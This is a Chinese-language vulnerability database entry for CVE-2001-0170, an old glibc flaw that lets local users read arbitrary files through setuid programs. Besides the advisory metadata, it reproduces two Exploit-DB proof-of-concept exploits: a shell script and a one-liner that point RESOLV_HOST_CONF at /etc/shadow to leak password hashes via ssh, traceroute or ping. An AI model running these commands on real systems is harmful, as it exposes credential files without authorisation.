CVE-2001-0170
CVSS2.1
发布时间 :2001-03-26 00:00:00
修订时间 :2008-09-05 16:23:26
NMCOE    

[原文]glibc 2.1.9x and earlier does not properly clear the RESOLV_HOST_CONF, HOSTALIASES, or RES_OPTIONS environmental variables when executing setuid/setgid programs, which could allow local users to read arbitrary files.


[CNNVD]Glibc setuid/setgid文件泄露漏洞(CNNVD-200103-082)

        Glibc 2.1.9x及其之前的版本在执行setuid/setgid程序时,不正确清除RESOLV_HOST_CONF,HOSTALIASES,或RES_OPTIONS环境变量,本地用户可以利用该漏洞读取任意文件。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:conectiva:linux:5.1Conectiva Conectiva Linux 5.1
cpe:/o:conectiva:linux:ecommerceConectiva Conectiva Linux ecommerce
cpe:/o:redhat:linux:7.0::i386
cpe:/o:conectiva:linux:6.0Conectiva Conectiva Linux 6.0
cpe:/o:debian:debian_linux:2.3Debian Debian Linux 2.3
cpe:/o:conectiva:linux:4.0Conectiva Conectiva Linux 4.0
cpe:/o:conectiva:linux:5.0Conectiva Conectiva Linux 5.0
cpe:/o:conectiva:linux:4.2Conectiva Conectiva Linux 4.2
cpe:/o:conectiva:linux:graficasConectiva Conectiva Linux graficas
cpe:/o:redhat:linux:7.0::alpha
cpe:/a:immunix:immunix:7.0_beta
cpe:/o:conectiva:linux:4.0esConectiva Conectiva Linux 4.0es
cpe:/o:conectiva:linux:4.1Conectiva Conectiva Linux 4.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0170
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0170
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200103-082
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2181
(VENDOR_ADVISORY)  BID  2181
http://www.redhat.com/support/errata/RHSA-2001-001.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2001:001
http://archives.neohapsis.com/archives/bugtraq/2001-01/0186.html
(VENDOR_ADVISORY)  BUGTRAQ  20010110 [slackware-security] glibc 2.2 local vulnerability on setuid binaries
http://xforce.iss.net/static/5907.php
(VENDOR_ADVISORY)  XF  linux-glibc-read-files
http://archives.neohapsis.com/archives/bugtraq/2001-01/0131.html
(VENDOR_ADVISORY)  BUGTRAQ  20010110 Glibc Local Root Exploit

- 漏洞信息

Glibc setuid/setgid文件泄露漏洞
低危 未知
2001-03-26 00:00:00 2006-09-20 00:00:00
本地  
        Glibc 2.1.9x及其之前的版本在执行setuid/setgid程序时,不正确清除RESOLV_HOST_CONF,HOSTALIASES,或RES_OPTIONS环境变量,本地用户可以利用该漏洞读取任意文件。

- 公告与补丁

        

- 漏洞信息 (258)

glibc-2.2 and openssh-2.3.0p1 exploits glibc >= 2.1.9x (EDBID:258)
linux local
2001-01-25 Verified
0 krochos
N/A [点击下载]
# Charles Stevenson <csteven@newhope.terraplex.com>
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)
# This exploits is for glibc >= 2.1.9x.
# (****krochos@linuxmail.org****)
# Edit this if you have a problem with path

ssh=/usr/bin/ssh
traceroute=/usr/sbin/traceroute
FILE=/etc/shadow        # File to read
###############################################################################

echo "$ssh"
echo "[*] Checking permisions..."

if [ ! -u $ssh ]; then
        echo "$ssh is NOT setuid on this system or does not exist at all!"
        if [ ! -u $traceroute ]; then
          echo "$traceroute is NOT setuid on this system or does not exist at all!"
          exit 0
        fi
fi

export RESOLV_HOST_CONF=$FILE

echo "[*] Glibc bug found by Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>"
echo "[*] krochos@linuxmail.org"
sleep 1
echo "[*] export  RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv
cat /tmp/.resolv |  cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '

# milw0rm.com [2001-01-25]
		

- 漏洞信息 (317)

Resolv+ (RESOLV_HOST_CONF) Linux Library Local Exploit (EDBID:317)
linux local
1996-01-01 Verified
0 Jared Mauch
N/A [点击下载]
setenv RESOLV_HOST_CONF /etc/shadow; ping adfas

# milw0rm.com [1996-01-01]
		

- 漏洞信息

1710
GNU C Library (glibc) Multiple Environment Variable Arbitrary File Access
Local Access Required
Loss of Confidentiality Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2001-01-10 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站